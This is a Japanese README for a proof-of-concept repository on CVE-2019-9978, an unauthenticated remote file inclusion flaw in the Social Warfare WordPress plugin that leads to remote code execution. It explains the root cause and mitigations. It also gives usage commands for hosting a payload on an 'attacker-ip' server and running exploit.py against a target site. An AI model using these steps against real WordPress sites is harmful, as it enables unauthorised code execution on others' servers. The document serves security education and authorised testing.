
CVE 2019-9978(Social Warfare プラグイン)、根本原因分析と悪用を示すカスタム Python 概念実証。実用的な RFI から RCE への攻撃フローに焦点を当てています。
このリポジトリは、Social Warfare WordPress プラグイン の深刻な脆弱性 CVE-2019-9978 の悪用を示す Python ベースの概念実証 (PoC) を含んでいます。
この脆弱性により、認証されていない攻撃者 が リモートファイルインクルージョン (RFI) を実行でき、攻撃者が制御するサーバー上で悪意のあるペイロードをホストすることで Remote Code Execution (RCE)* にエスカレートされる可能性があります。
この PoC は、教育および許可されたセキュリティテスト目的のみで、管理された WordPress ラボ環境 で開発およびテストされました。
Social Warfare プラグインは、リモートコンテンツインクルージョンに使用されるユーザー提供の入力を適切に検証およびサニタイズできません。
その結果、攻撃者は悪意のある外部 URL を提供でき、非認証リモートファイルインクルージョン につながります。
インクルードされたリモートファイルに実行可能な PHP コードが含まれている場合、WordPress サーバーのコンテキストで実行され、リモートコード実行 につながります。
Unauthenticated HTTP Request
↓
Remote File Inclusion (External URL)
↓
Malicious Payload Execution
↓
Remote Code Execution (RCE)
python3 -m http.server 8000
ペイロードファイル(例:payload-main.txt)をサーバーディレクトリに配置します。
python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt
Social Warfare プラグインをパッチ適用済みバージョンに更新する
リモートファイルインクルージョンを無効にする:
allow_url_include = Off
WordPress プラグインでの外部 URL 処理を制限する
RFI 検出ルールを備えた Web アプリケーションファイアウォール (WAF) を導入する
このプロジェクトは、教育目的および許可されたセキュリティテストのみ を厳格に目的としています。
明示的な許可なくこの概念実証をシステムに対して使用 しないでください。
作成者は、このツールによって引き起こされた誤用や損害について一切責任を負いません。